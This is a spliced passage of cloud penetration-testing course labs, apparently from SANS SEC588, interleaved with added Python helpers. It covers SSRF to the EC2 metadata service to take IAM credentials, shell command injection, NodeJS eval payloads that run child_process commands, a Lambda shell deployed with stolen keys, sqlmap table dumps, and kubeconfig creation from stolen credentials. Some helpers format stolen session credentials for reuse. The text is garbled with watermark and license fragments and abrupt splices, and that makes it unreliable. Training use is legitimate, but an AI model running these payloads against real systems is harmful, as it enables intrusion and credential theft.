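Run it as a required status check on pull requests that touch the pipeline file; the build itself cannot be trusted to report on a step that was written to exfiltrate its own environment.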
Conclusions

The ability for us to validate and understand the changes that occur in the most sensitive parts of our infrastructure environments will be paramount to understanding what is occurring in the overall architecture. Are defenders monitoring the most sensitive and critical files in their network? Is there something that they can do to make the environment better? This includes modifications to Dockerfiles and .travis.yml files, which are

Remember you will need to revert the config file to update the wiki:

$ nano /home/sec588/.ssh/config

host github.com
Hostname github.com
IdentityFile ~/.ssh/sec588-wiki-vm-keys
#IdentityFile /home/sec588/.ssh/day4
User git

This will allow wiki-updater.sh to work.

Why This Lab Is Important

This is important as more repositories become breached, more environment libraries are being moved from developers to hackers, and more keys are exposed. Demonstrating the true impact to an organization is critical for us to understand how attackers are taking over infrastructures and abusing the trust they have placed in many of their own deployment systems.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
This lab showcases the impacts of SSRF. This particular bug allows us to gain access into an environment by using the web application as a proxy to internal web applications. This would grant the user the capability of moving around an environment in a predictable way. One of the more important components of this would be to take this and consistently ask for URLs in the applications to see if they exist. We can even inspect locally served files if we know what they are or can guess them.

Remember that microservices and cloud native applications use HTTP/HTTPS as an internal transport protocol for many of their services. Using the SSRF we can even start to look for other endpoints if we know what they are.

We will also attempt to cause an error; the error output of our lab will show up what type of application this really is.

Requirements for This Lab

A working internet connection, access to the VM browser, and access to cURL.

Try It Yourself

You will be getting the AWS keys of an EC2 worker node using the meta-data service from within a container.

1. Go to invoice.<class-subdomain>.sec588.net
3. Find the URL that is located in the homepage that is '/url'
4. Look at the URL GET request and attempt to execute an SSRF by:

Getting started

Most of the labs in the Cloud Native Day are based on microservices; our endpoint will be the following:

http://invoice.<class-subdomain>.sec588.net

Open Firefox and let's take a look at this particular site.

This application is built of multiple containers and, much like our picture, we will try and uncover the different components.

The first thing that we will do in our application is look at the way that SSRFs are designed. On the web page you will see a link to /url. Click the link and it should take you to the following URL:

DO NOT CLICK ON THIS LINK BELOW, it will be different for your class

If you use a web browser for the step below it will FAIL, as the way the SSRF triggers may or may

http://invoice.<class-subdomain>.sec588.net/url?url=http://localhost:8080/static/ssrf.html

Let's trigger an error; for this step and this step only we will not browse

Also note: if this hangs, CTRL-C and try again.

The URL shows up with the following items: url?url=hrl?url=http://localhost:8080/ and what this tells the library is that our URL is purposefully malformed, but the trailing / allows the system to execute this.

This will fail, but what is more interesting is that a DEBUG message appears.

What we will see is output that looks like a stack trace and debug line. Some of the words we will need to pay attention to:

requests.exceptions
/usr/local/lib/python3.6/

All of these are indicators that we are running in a Python-based container. We may need this information later.

Let's see how this bug will impact us. First we should note that many default web servers do not run on a 'root' level port, that is, a port that is below 1024. We happen to see many servers running on ports like 8000, 8080, 8443, etc. We are going to start by guessing that this environment could be 8080, as the Python stack trace showed it to be running Flask. Flask is commonly run on port 8080. Let's look:

This should push our own local web server into our page. A page within our page: inception. Remember back to Day 2 with our IAM and escalation examples; maybe this container is running at a cloud provider, maybe within EC2, or maybe within GCP. What we can start to understand is whether we have the capability to browse other internal pages using this page as a file reader. We do not yet know what the actual pages are; for that we will need a different bug. Let's however see if we can get further into the environment.

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/

From this point you should be looking at a nice view of the meta-data API. Let's explore what we know about this host:

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/hostname

The hostname of this device is:

ip-192-168-<XX-YYY>.us-east-X.compute.internal

We can see this node is running in an IP range of 192.168.X.X in the us-east-1 datacenter. What else can we learn:

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/public-hostname

We could also get an indication of the type of device by looking at security-group names and some other items:

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/security-groups
http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/iam/info

Each one of these queries has details about the type of device; the words 'eks' or 'eksctl' may give us some indication.

This will display the name of the role that we wish to query:

http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<rolename>
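The lab's error output points at a Python service that calls requests.get on the url parameter. The following is an added example, not the lab application's code: the vulnerable pattern beside a validator that applies the controls a hardened /url endpoint needs (scheme check, host allowlist, and rejection of every resolved address in loopback, link-local, private or reserved space, so that 169.254.169.254 is refused even when it hides behind a DNS name). Function names are assumptions, DNS resolution is injected so the code runs offline, and the resolver table and allowlist are constructed.

```python
"""Added example, not the lab application's code: the fetch-a-URL handler
pattern (Flask + requests) as the vulnerable form beside a hardened validator.

`unsafe_fetch_url_param` mirrors the behaviour described above;
`validate_target` is the added control. The resolver table and the
allowlist are constructed.
"""
import ipaddress
import socket
from urllib.parse import urlparse

IMDS = "169.254.169.254"
# Hosts this service is actually allowed to call (constructed allowlist).
ALLOWED_HOSTS = {"api.example.com", "static.example.com"}


def unsafe_fetch_url_param(url, do_get):
    """Vulnerable pattern: proxy whatever `url` says, with no destination check.
    `do_get` stands in for requests.get(url).text."""
    return do_get(url)


def _blocked_ip(addr):
    ip = ipaddress.ip_address(addr)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def _system_resolver(host):
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def validate_target(url, resolver=None):
    """Return (ok, reason, resolved_ip). `resolver(host)` -> list of IP strings.

    Order matters: scheme, allowlist, then every resolved address, so that a
    hostname pointing at 169.254.169.254 or 127.0.0.1 is rejected even though
    the literal text looked harmless."""
    resolver = resolver or _system_resolver
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme-not-allowed", None
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return False, "host-not-allowlisted", None
    try:
        addrs = resolver(host)
    except (socket.gaierror, OSError):
        return False, "dns-failure", None
    if not addrs:
        return False, "dns-failure", None
    for addr in addrs:
        if addr == IMDS or _blocked_ip(addr):
            return False, "resolves-to-internal-address", addr
    # Connect to addrs[0] directly (pin the resolved IP) so that a second
    # lookup at connect time cannot rebind the name to an internal address.
    return True, "ok", addrs[0]


# Constructed resolver table standing in for DNS.
FAKE_DNS = {
    "api.example.com": ["93.184.216.34"],
    "static.example.com": ["192.168.10.5"],   # allowlisted but internal: rejected
}


def fake_resolver(host):
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for u in ("http://169.254.169.254/latest/meta-data/",
              "http://api.example.com/v1/invoices",
              "http://static.example.com/ssrf.html",
              "file:///etc/passwd"):
        print(u, validate_target(u, fake_resolver))
```

On EC2 the complementary control is IMDSv2: credentials are only served after a PUT request that returns a session token, which a GET-only proxy like this endpoint cannot make, so enforcing IMDSv2 on the worker nodes closes the path the lab walks even if the application bug remains.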
If you have additional time

Attempt to make these commands execute through command line tools such as:

curl

This lab begins our Cloud Native Day; one of the core components of a cloud native application is its capability to properly handle URL inputs. We will see how this is impacting our tests going forward with the other

Additional Resources

SANS SEC642: Advanced Web Application Penetration Testing (https://www.sans.org/sec642)
Brief Intro
ly
Ju
>
Command Injection bugs are quite common given the amount of work that command line tools a ord us. Even
om
when command line tools are not directly called, we can manipulate existing software to inject operating system
_c
commands for us to use. We will be exploring two services in this lab. The /ping service and the invoice service.
ok
23169600 tlo
One thing about these containers, they unlike the last system, are not running python.
@
ou
66
Gregg Harris
au
Try It Yourself
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
If you wish to try this on your own:
G:
To
1. You will nd that within the http://invoice.<class-subdomain>.sec588.net lab there are multiple
d
endpoints.
n se
ce
live
3. Using base64 pull out the contents of the ping.php le on the system to obverse what the vulnerability is
5. Find a way to execute commands through an RCE in NodeJS, the functions is in the invoice search area.
3e1e3b497543e6c11ac8e4188959c93e
a. Can you manipulate javascript in this post?
b. As this is actually as these commands are running in a URL, what do you have to modify to execute code?
20
20
c. Can you look through the le system? Can you run any commands?
,
28
pauljones166@outlook_com
ly
Walkthrough
Ju
>
om
Direct Command Injection
_c
Let's open our Web Browing interface one more time.
ok
23169600
$firefox http://invoice.<class-subdomain>.sec588.net
@
ou
tlo
66
This time we will be look at two URL endpoints, the rst one is our /ping process.
s1
ne
If we click on it we can enter anything we want to ping. Ping localhost on the machine
ljo
Gregg Harris
au
127.0.0.1
<p
s
rri
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
By running this command we should also notice that we may be able to trigger additional commands:
>
om
Hit the Back icon on the brower and let's try this:
_c
ok
127.0.0.1; ls
23169600
The output should re ect something like:
@
ou
tlo
66
Gregg Harris
au
<p
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
ping.php
n
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
We now see at the bottom of the page a new item ping.php
_c
ok
It would appear our container is running a php process called ping. We can do a few things here.
Gregg Harris
au
<p
========
Ha
gg
ping.php
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
20
,
28
pauljones166@outlook_com
ly
Ju
>
om
We cannot, however, view the contents of the PHP file this way:

127.0.0.1; echo "============"; cat ping.php

This will not show us anything. Why? The file is a single <?php ... ?> block, and the browser parses everything between <? and > as a comment-like tag rather than as text, so nothing is rendered (View Source would show it). Encoding the file first turns it into plain text the browser will display:

127.0.0.1; echo "============"; base64 ping.php

We now see a base64 encoded string. What you will see is something like this:

PD9waHAKJHN5c3RlbT0kX0dFVFsnc3lzdGVtJ107CnN5c3RlbSgicGluZyAtYzIgJHN5c3RlbSIpOwo/Pgo=
With this string in hand you can decode it. Open a MATE Terminal and copy the string like so:

$ echo "PD9waHAKJHN5c3RlbT0kX0dFVFsnc3lzdGVtJ107CnN5c3RlbSgicGluZyAtYzIgJHN5c3RlbSIpOwo/Pgo=" | base64 -d

Note that the browser will break the string across lines; you need to make it all appear on one single line for the decode to work.

The decoded file shows the whole bug in three lines: the system parameter is read from the request and interpolated, unquoted and unvalidated, into a system("ping -c2 ...") call. As we can see, this is a very simple way of getting access to both source code and the ability to smuggle out items.
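As an added example (not code from the SEC588 workbook), the following Python decodes the base64 string recovered above, locates the tainted system() call in the result, and contrasts what the lab's ping.php hands to the shell with a hardened version that accepts only a literal IP address. The parameter name system comes from the decoded file; shlex.quote stands in for PHP's escapeshellarg().

```python
import base64
import ipaddress
import re
import shlex

# The base64 string recovered through the injection in the walkthrough.
PING_PHP_B64 = ("PD9waHAKJHN5c3RlbT0kX0dFVFsnc3lzdGVtJ107"
                "CnN5c3RlbSgicGluZyAtYzIgJHN5c3RlbSIpOwo/Pgo=")


def decode_ping_source(b64: str = PING_PHP_B64) -> str:
    """Decode the smuggled-out PHP source. The browser wraps long base64
    output onto several lines, so strip all whitespace before decoding."""
    return base64.b64decode(re.sub(r"\s+", "", b64)).decode()


def find_tainted_system_call(php: str):
    """Return (request parameter, command template) when a $_GET/$_POST value
    is interpolated straight into system(); None otherwise. A pattern match
    sized for the lab's three-line file, not a PHP parser."""
    assign = re.search(r"\$(\w+)\s*=\s*\$_(GET|POST)\['(\w+)'\]", php)
    if not assign:
        return None
    var, _method, param = assign.groups()
    call = re.search(r'system\("([^"]*\$' + var + r'[^"]*)"\)', php)
    return (param, call.group(1)) if call else None


def vulnerable_command(template: str, value: str) -> str:
    """What the lab's ping.php hands to /bin/sh: plain string interpolation,
    so a ';' in the value terminates ping and starts a second command."""
    return template.replace("$system", value)


def hardened_command(value: str) -> str:
    """A fixed ping: accept only a literal IP address and quote it for the
    shell (shlex.quote here, escapeshellarg() in PHP). Raises ValueError
    for anything else, including '127.0.0.1; ls'."""
    ip = ipaddress.ip_address(value.strip())
    return "ping -c2 " + shlex.quote(str(ip))


def injection_rejected(value: str) -> bool:
    """True when the hardened version refuses the value."""
    try:
        hardened_command(value)
        return False
    except ValueError:
        return True
```

Validation before quoting is the point: escapeshellarg() alone would stop the "; ls" trick, but accepting only something ipaddress can parse also removes hostnames, option injection (a value starting with "-") and every other surprise ping could be handed.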
Let's explore what is on this container. Type in the following command to try:

127.0.0.1; echo "============"; which curl

We can see that the container has some interesting items that we may wish to explore in the future.

The second endpoint is the invoice search on http://invoice.<class-subdomain>.sec588.net itself.

What we see is some information on the screen: the name of the container as well as the invoice date.

Let's now attempt the same command injection technique. Attempt to type:

1%3Bls

This should provide us with an error. If it does not come back right away, restart the request. It may also be helpful to run this from the command line with curl in case the system is not responding, which happens from time to time:

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=1%3B+ls"
NodeJS is not the same as many of the other systems in that it cannot simply shell out. Instead, a shell has to be constructed out of NodeJS code, and the return value of that execution must be handled by the injected code itself.

Using the fs library you can do the following. To ls a directory you would want to use:

res.end(require('fs').readdirSync('.').toString())

One thing to note is that the default programming pattern in NodeJS for a request and response is to use the names res and req, so we will need to end the response ourselves and hand it whatever we want returned. It will look strange.

Alternatively in cURL:

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('fs').readdirSync('.').toString())"

This should output a list of files in the directory.

Note the text will look like HTML!
You may see names appear like Dockerfile, index.js, node_modules and the like.

This particular container may have shipped with a Dockerfile. Let's read it:

res.end(require('fs').readFileSync('Dockerfile').toString())

Alternatively in cURL:

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('fs').readFileSync('Dockerfile').toString())"

What happens if we try and read the root of the filesystem? In the browser enter:

res.end(require('fs').readdirSync('/').toString())

It will more than likely fail. The URL shows us the following:

http://expected-invoice-svc.default.svc.cluster.local:8080/api/expected-date/res.end(require('fs').readdirSync('/').toString())

Our input is not evaluated by the front end at all: it is placed into the path of a second request to an internal service, and that is where it runs. The slash in '/' becomes a path separator in that request and breaks the route, so it has to be URL-encoded twice, once for each hop. In the browser enter:

res.end(require('fs').readdirSync('%252F').toString())

How can we trigger command execution this way?

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('child_process').execSync('ls').toString())"
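The following Python, added here and not part of the lab, builds the invoiceid payloads used above and simulates the two hops the failing URL reveals: the front end form-decodes the value once and drops it into the path of a request to expected-invoice-svc, and that service decodes its path segment once more before evaluating it. The exact decoding layers are an assumption drawn from that URL; the simulation exists to show why a bare '/' breaks the route and why '%252F' survives.

```python
from urllib.parse import quote, unquote

# Assumption drawn from the URL the lab shows when reading '/' fails: the
# front end puts the invoiceid value into the path of a request to this
# internal service, and that service evaluates the path segment as code.
UPSTREAM = ("http://expected-invoice-svc.default.svc.cluster.local:8080"
            "/api/expected-date/")


def node_payload(js_expression: str) -> str:
    """res.end() finishes the HTTP response with the evaluated value, which is
    how output gets back to us from an eval sink that never returns."""
    return f"res.end({js_expression})"


def readdir(path: str) -> str:
    return node_payload(f"require('fs').readdirSync({path!r}).toString()")


def readfile(path: str) -> str:
    return node_payload(f"require('fs').readFileSync({path!r}).toString()")


def execsync(cmd: str) -> str:
    return node_payload(f"require('child_process').execSync({cmd!r}).toString()")


def curl_data(payload: str) -> str:
    """The literal --data argument; curl sends it on the wire unchanged."""
    return "invoiceid=" + payload


def front_end_forwards(body: str) -> str:
    """Hop 1 (assumed): form-decode the field once, build the upstream URL."""
    field = unquote(body.split("=", 1)[1])
    return UPSTREAM + field


def upstream_evaluates(url: str) -> str:
    """Hop 2 (assumed): the route accepts a single path segment and decodes it
    once more before eval. A '/' inside the value makes the route not match."""
    if not url.startswith(UPSTREAM):
        raise ValueError("not an expected-date request")
    segment = url[len(UPSTREAM):]
    if "/" in segment:
        raise ValueError("value split the path: route does not match")
    return unquote(segment)


def deliver(payload: str):
    """End-to-end: the JavaScript the upstream finally evaluates, or None when
    the request breaks on the way (the lab's 'it will more than likely fail')."""
    try:
        return upstream_evaluates(front_end_forwards(curl_data(payload)))
    except ValueError:
        return None


def encode_for_upstream(path: str) -> str:
    """Quote twice so the path survives both decodes: '/' -> %2F -> %252F."""
    return quote(quote(path, safe=""), safe="")
```

The same double-encoding rule applies to anything else that is special in a URL path, such as '?' or '#', so run every path argument through encode_for_upstream rather than only the root directory.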
Alternatively, if we only had the ability to read and write to the file system, we could write the command output to a file and then read that file back.

Please note we are using a random file name because multiple students will be attacking the same host. The general task here is to put our return values in a file like so: "ls > random_file_name", where "random_file_name" is the name you chose, and then read it back:

$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data "invoiceid=res.end(require('fs').readFileSync('<same as the above command random name>').toString())"

Now we have a very rudimentary RCE. From here we can go further, such as reading environment variables and more. Is this pretty? No, no one would actually want to hack this way for long; however, it does get us the access we need.

With this level of access we now have two remote code executions and an SSRF bug, which will provide us with the beginnings of a way to get deeper into a web application.
Additional Resources
Brief Intro

While command injection and SSRFs are attacks that plague a wide number of applications and allow for internal pivots, serverless functions themselves can allow us to move around the environment.

In this lab we are going to introduce you to a serverless environment where we can upload a JavaScript NodeJS function that will give us a full shell.

Requirements for This Lab

This lab requires the student to have:

Try It Yourself

1. You should be using the same AWS credentials from Lab 2.5 for this lab (profile named lab25).
2. SSH into the IP address from Lab 2.5 that has the ec2-kms-role.

Walkthrough
$ ssh -i /home/sec588/files/workdir/studentX-<class-subdomain>.pem ubuntu@<ip from section2>
$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-kms-role-<class-subdomain>

This does the following:

SSH into the host as the ubuntu user
Get access to the IAM metadata service through cURL. The JSON returned carries an AccessKeyId, a SecretAccessKey and a session Token, and all three are needed together: the key pair alone is rejected.

With this session token we can now deploy a Lambda function. We have provided a lambda shell function in the IAM so that you can explore how to execute a shell within a Lambda function.

Editing the project file

We need to first figure out the IAM role that we are using. One way is to run a command like so:

This WILL fail, but it will give you the information needed to proceed.

You will see an error that shows the command was not successful, but it will also show you the IAM ARN:

The information you will need is:

The <account-id>

With this role noted, we can now use pieces of this information correctly.

Our example shell is located at /opt/lambda-shell. To use it we need to make a few changes:

Second, there is a line that reads the role; the role should be: arn:aws:iam::<number>:role/ec2-kms-role-<class-subdomain>

You will need to validate a few things:

The account is valid
The <class-subdomain> role is valid

If they are, we can then move on to run and execute the role.
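An added Python helper (not from the lab files) for the two bits of bookkeeping this step needs: rebuilding the IAM role ARN from the assumed-role ARN in the AccessDenied error, and turning the IMDS credential document into a profile that carries the session token. Both inputs below are constructed samples; the account id 123456789012, the class subdomain class01, the instance id and the key material are placeholders.

```python
import json
import re
from datetime import datetime

# Constructed sample of the document the IMDS URL above returns. Account id,
# class subdomain ("class01"), instance id and key material are placeholders.
IMDS_CREDS_JSON = """{
  "Code": "Success",
  "LastUpdated": "2020-07-28T10:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAEXAMPLEEXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2VjEXAMPLETOKEN",
  "Expiration": "2020-07-28T16:00:00Z"
}"""

# Constructed sample of the AccessDenied error the walkthrough relies on.
SAMPLE_ERROR = ("An error occurred (AccessDeniedException) when calling the "
                "ListFunctions operation: User: arn:aws:sts::123456789012:"
                "assumed-role/ec2-kms-role-class01/i-0abc123 is not authorized "
                "to perform: lambda:ListFunctions")

ASSUMED_ROLE = re.compile(r"arn:aws:sts::(\d{12}):assumed-role/([^/\s]+)/")


def role_arn_from_error(message: str) -> str:
    """An instance profile shows up in errors as an STS assumed-role ARN.
    Pull the account id and role name out of it and rebuild the IAM role ARN
    that the lambda-shell project file expects."""
    match = ASSUMED_ROLE.search(message)
    if not match:
        raise ValueError("no assumed-role ARN in message")
    account, role = match.groups()
    return f"arn:aws:iam::{account}:role/{role}"


def credentials_profile(imds_json: str, profile: str = "ec2-kms-role") -> str:
    """Turn the IMDS document into an ~/.aws/credentials section. These are
    session credentials: without aws_session_token the key pair is rejected."""
    creds = json.loads(imds_json)
    if creds.get("Code") != "Success":
        raise ValueError(f"IMDS returned {creds.get('Code')!r}")
    return (f"[{profile}]\n"
            f"aws_access_key_id = {creds['AccessKeyId']}\n"
            f"aws_secret_access_key = {creds['SecretAccessKey']}\n"
            f"aws_session_token = {creds['Token']}\n")


def seconds_until_expiry(imds_json: str, now_utc: str) -> float:
    """Instance credentials rotate. Given the current UTC time in the same
    ISO form IMDS uses, report how long the stolen set remains valid."""
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    expiry = datetime.strptime(json.loads(imds_json)["Expiration"], fmt)
    return (expiry - datetime.strptime(now_utc, fmt)).total_seconds()
```

Paste the output of credentials_profile() into ~/.aws/credentials on the attacking machine and use --profile with that name; the Expiration field tells you how long before the whole dance (SSH in, hit IMDS again) has to be repeated.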
Executing our shell

First we need to deploy our shell to a new Lambda function:

$ cd /opt/lambda-shell

It should finish. If it does, then we can execute it using our looping function:

$ ./lambda-shell

With lambda-shell running we are now able to run some commands and explore.

Type:

ls

This will take a few minutes to run as the Lambda function will need to deploy and execute. After it is deployed you can now run much faster, as it is in a warm-started condition.

One of the things about Lambdas that you may notice right away is that many of them may not have the IP

You will probably see that you are running as a random, lower-privileged sandbox user.

As a matter of fact this particular container may actually be Amazon Linux:

You will see that it is: Amazon Linux 2 (Karoo)

Once again we are challenged with some items like whether we are able to move laterally, and the answer will depend on a few things:

1. What IAM privileges do we have with the Lambda?
2. What VPC is the Lambda in?
3. What else can the Lambda do?

Because we are creating and executing this Lambda ourselves, it is not the same as an already running Lambda that can do command execution: its permissions and network placement are whatever our deployment gave it, not what a victim's function would have.
Type: env

What we can see are various variables, including the 169.254 address space. This shell allows us to better understand how a serverless environment works and its limitations. Each serverless container will be different, so a Python runtime will behave differently than a NodeJS runtime and the like. If you would like to see how the runtimes operate you can view the directory that holds the runtime:

Look for LAMBDA_RUNTIME_DIR=, which in our case is the /var/runtime directory. You can explore these files; some will work, some won't. If you get stuck, ^C the shell and come back in.

Type: ls /var/runtime

Conclusion

Serverless environments will have various limitations depending on the cloud provider. AWS Lambda, for example, is a rather constrained serverless environment that is different from Azure. Our explorations will highlight the differences.
Brief Intro

SQL injections can be very difficult to understand. There are many places in which the injection can be broken; some will lead to successful exploitation and some will not. Some will be easy to uncover and some will not. This lab is designed to reflect on how this is possible and under which conditions exploitation is available to us.

Overall Lab Architecture

We have an application that is located at the following URL:

http://sqlinj.<class-subdomain>.sec588.net/index.php

2. The order_id= is filled out with what is passed on the form.
3. The result of the query to order_id= is a JSON array that is successfully returned.
4. The array is called via cURL in PHP.

Let's explore this environment so that we can try and uncover any types of SQL injection.

Requirements for This Lab

This lab requires the student to have:

A stable internet connection, a web browser and a copy of SQLMap.

Try It Yourself

4. Look at the RESTful API call:

http://sqlinj.<class-subdomain>.sec588.net/api/1234

6. Look at the underlying code in the walkthrough and see if you can uncover the actual URL.

Walkthrough

http://sqlinj.<class-subdomain>.sec588.net/index.php
Let's try a few common SQL injection tests that attempt to provoke error-based SQL injection. Error-based injection is not as common as it once was, and we can see that this type of testing will not yield us any obvious result:

' or "

in the form will not show us an SQL error. What about if we use a tool like sqlmap.py?

$ cd /opt/sqlmap
$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net' --data "order_id=1234&submit=submit"

--data "order_id=1234&submit=submit" sends a POST with the values that are submitted with the form.

Many of our APIs are RESTful in nature, and this particular endpoint is no different. Let's take a look at the code powering our website.
<?php
if (isset($_POST['order_id']) && $_POST['order_id']!="") {
    $order_id = $_POST['order_id'];
    $url = "http://localhost/api/$order_id";
    $client = cur_init($url);
    curl_setopt($client,CURLOPT_RETURNTRANSFER,true);
    $response = curl_exec($client);
    $result = json_decode($response);
}

Notice the following two lines in this statement:

$order_id = $_POST['order_id'];
$url = "http://localhost/api/$order_id";

The lines show us that the order id is received in an HTTP POST and then passed straight into a URL. The form never touches SQL itself; it is a client of the API.

This type of information can be pulled out of websites in multiple ways. For this particular lab we are skipping the methods for obtaining the source code. Instead we are focusing on the URLs:

http://sqlinj.<class-subdomain>.sec588.net/api/1234
Open Firefox and get to the appropriate URL:

Let's try getting a URL: http://sqlinj.<class-subdomain>.sec588.net/api/%27

What we see is an Apache error message stating that a specific page is not found. This is not a PHP error or a MySQL error message. There could be a few ways this is occurring. Here is a shortcut.

Our .htaccess file is rewriting URLs so that PHP-based code is now a RESTful endpoint:

RewriteEngine On
# Turn on the rewriting engine

The following two URLs are the same:

/api/1234
/api.php?order_id=1234

The quote in /api/%27 does not match the rewrite pattern, so the request never reaches api.php and Apache answers 404 itself; the injection has to go to api.php directly.
SQL Injecting the RESTful Endpoint

What if we attempt SQL injection on this particular endpoint, passing the same quote to api.php?order_id= directly?

We see a JSON array is returned, and the JSON array is rendered NULL. No error, no stack trace: the failed query is swallowed and the only signal is that the row disappeared. Let's look at the code that is causing our injections:

$order_id = $_GET['order_id'];

The vulnerability here is that whatever is passed into the GET parameter order_id is passed directly into SQL. Without any filtering this goes straight into the SQL engine. This is classic SQL injection, but because nothing is reflected, without tools it would not be easily discoverable.
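To make the two observations above concrete (the 404 for /api/%27 and the NULL JSON for a broken query), here is an added Python model of the endpoint; it is not the lab's PHP. The rewrite pattern is assumed to be digits-only, since the lab's .htaccess is not shown; the transactions table is a constructed stand-in in SQLite. api_php_vulnerable concatenates the way api.php does, api_php_fixed binds the value, and boolean_blind_probe is the true/false check sqlmap automates.

```python
import re
import sqlite3
from urllib.parse import unquote

# Assumed rewrite behind /api/<id> -> /api.php?order_id=<id>. The lab's
# .htaccess is not shown; a digits-only capture explains why /api/%27 is
# answered by Apache's 404 instead of reaching PHP at all.
REWRITE = re.compile(r"^/api/(\d+)$")


def route(path: str):
    """The order_id api.php would receive for a /api/... path, or None (404)."""
    match = REWRITE.match(unquote(path))
    return match.group(1) if match else None


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's db.transactions table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE transactions (order_id INTEGER, amount REAL, customer TEXT)")
    con.executemany("INSERT INTO transactions VALUES (?, ?, ?)",
                    [(1234, 19.99, "alice"), (1235, 250.0, "bob")])
    return con


def api_php_vulnerable(con, order_id: str):
    """Model of api.php: $_GET['order_id'] concatenated into the statement.
    A failed query is swallowed and the JSON comes back NULL, as the
    walkthrough shows, so only presence/absence of the row is observable."""
    try:
        rows = con.execute("SELECT order_id, amount, customer FROM transactions "
                           "WHERE order_id = " + order_id).fetchall()
    except sqlite3.Error:
        return None
    return rows or None


def api_php_fixed(con, order_id: str):
    """Parameterised form: the value is bound, never parsed as SQL."""
    rows = con.execute("SELECT order_id, amount, customer FROM transactions "
                       "WHERE order_id = ?", (order_id,)).fetchall()
    return rows or None


def boolean_blind_probe(handler, con, base_id: str) -> bool:
    """The test sqlmap automates when nothing is reflected: a TRUE condition
    must keep the row and a FALSE one must drop it for the parameter to be
    injectable."""
    with_true = handler(con, f"{base_id} AND 1=1")
    with_false = handler(con, f"{base_id} AND 1=2")
    return with_true is not None and with_false is None
```

Notice that route() never lets the probe through: the injection only exists once you address api.php by its real name, which is exactly why the REST-looking front door gives sqlmap nothing.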
Let's try the following. Open a MATE terminal and run the following commands:

If you accept the defaults you will see that SQL injection is now possible.

We need to be careful, as this particular system may be a shared database instance. Heavy queries should be avoided if possible, and getting shells is not possible in many cloud environments, as the providers give clear guidance on this. Attempt some of the following queries:

This should show us the databases on the system. Let's also see all the tables in the db database:

The database should have a single table, which would be the transactions table. We can dump this table or continue looking for more tables. Let's just play with the single database views.

$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' -D db -T transactions --count

We can see how many rows are in the table using the --count option. How can we safely dump a record to see?

$ ./sqlmap.py -u 'http://sqlinj.<class-subdomain>.sec588.net/api.php?order_id=1234' -D db -T transactions --dump --start=1 --stop=1

This concludes our tour of SQLMap and how to find injections in Cloud Native Applications. We do request that
Additional Resources
Brief Intro

Kubernetes is a container orchestration and lifecycle management framework. It is not the only framework that does this, as there are a few others, but by far and away Kubernetes has done a very good job of being the most commonly used one today. As such, Kubernetes has a management layer that is implemented on top of existing cloud environments. There are several ways to manage Kubernetes. There is a "Managed Configuration", in which a cloud provider will manage the Kubernetes cluster for you and use their native access management framework for Kubernetes management.

The other way to manage the system is what is known as "Unmanaged Kubernetes", in which the system is not managed in any meaningful way by the cloud provider. This would be on-premise or a self-managed cluster in the cloud. Kubernetes, being such a complex system, does have "vendor supported" implementations. Which ones?

Rancher
Heptio
Kontena

While each of these has its specific reasons for existing, we will be working with two types of Kubernetes in our class environments.
Requirements for This Lab

This particular lab will require the following components:

1. The aws CLI tools
2. The profile AWS keys obtained in Lab 1.4 and used in Lab 2.2
3. kubectl binary
4. peirates binary

Try It Yourself

Walkthrough

Some AWS users may have rights to Kubernetes; this will depend on a few things.

1. Who has access rights to build a Kubernetes configuration file that can get a user to have a proper

Each user may or may NOT have access to the RBAC cluster; by default many AWS users do not. Kubernetes has an authentication and now an authorization access control system.

The following policy allows ALL service accounts to act as cluster administrators. Any application running in a container receives service account credentials automatically, and could perform any action against the API, including viewing secrets and modifying permissions. This is not a recommended policy.

--user=admin \
--user=kubelet \
--group=system:serviceaccounts
We will begin by finding any EKS clusters:

$ aws eks list-clusters --region us-east-1 --profile lab22

You should see a cluster called:

class-eksctl-<class-subdomain>

Next we will build our own Kubernetes configuration from EKS. While this may not be your starting point for attacking a live Kubernetes cluster, given that we have a set of API keys we can start here:

$ aws eks update-kubeconfig --region us-east-1 --name class-eksctl-<class-subdomain> --profile lab22

The output should reflect that we have a new .kube/config file created. With this file we can now manage a Kubernetes cluster.

